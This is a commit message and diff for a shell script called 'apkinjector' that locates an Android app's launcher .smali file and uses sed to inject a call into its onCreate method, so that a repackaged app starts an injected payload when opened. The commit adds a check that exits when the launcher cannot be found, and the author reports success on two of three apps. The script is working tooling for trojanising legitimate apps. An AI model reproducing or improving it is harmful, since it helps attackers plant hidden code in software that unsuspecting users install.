Added exit on failure to find .smali launcher
Instead of running through the whole code and being told you are good, I had it exit upon failure to grep the .smali file to be used for pointing the injected payload. Currently, the script has worked for 2 of 3 apps. The grep line could be modified as needed. I may add a user input entry for when it fails to auto-find allowing the user to type in the .smali path they manually locate in the AndroidManifest.xml file.

diff --git a/apkinjector b/apkinjector
--- a/apkinjector
+++ b/apkinjector
@@ -60,7 +60,13 @@ sed -i 's#"##' /tmp/output_1  			# gets rid of the “
 sed -i 's/\./\//g' /tmp/output_1
 sed -i 's/[ \t]*$//' /tmp/output_1
 launcherSmali=`cat /tmp/output_1`.smali
-echo "Found smali launched in AndroidManifest.xml: $launcherSmali"
+if [ \! -s /tmp/output_1 ]; then 
+    echo -e "\033[31m Was unable to locate the .smali launcher in AndroidManifest.xml with the current grep command in place \x1B[0m"
+    echo "Checkout line 57 in apkinjector"
+    echo "Look for the MAIN function in AndroidManifest.xml located in /tmp/original. The .smali file used in that section is the line you want to grab"
+    exit 1
+fi
+echo -e "\033[32m Found smali launcher in AndroidManifest.xml: $launcherSmali \x1B[0m"
 
 #add injection to smali file
 sed -i "/onCreate(Landroid/ainvoke-static {p0}, Lcom/$VAR1/$VAR2/$VAR3;->start(Landroid/content/Context;)V" /tmp/original/smali/$launcherSmali
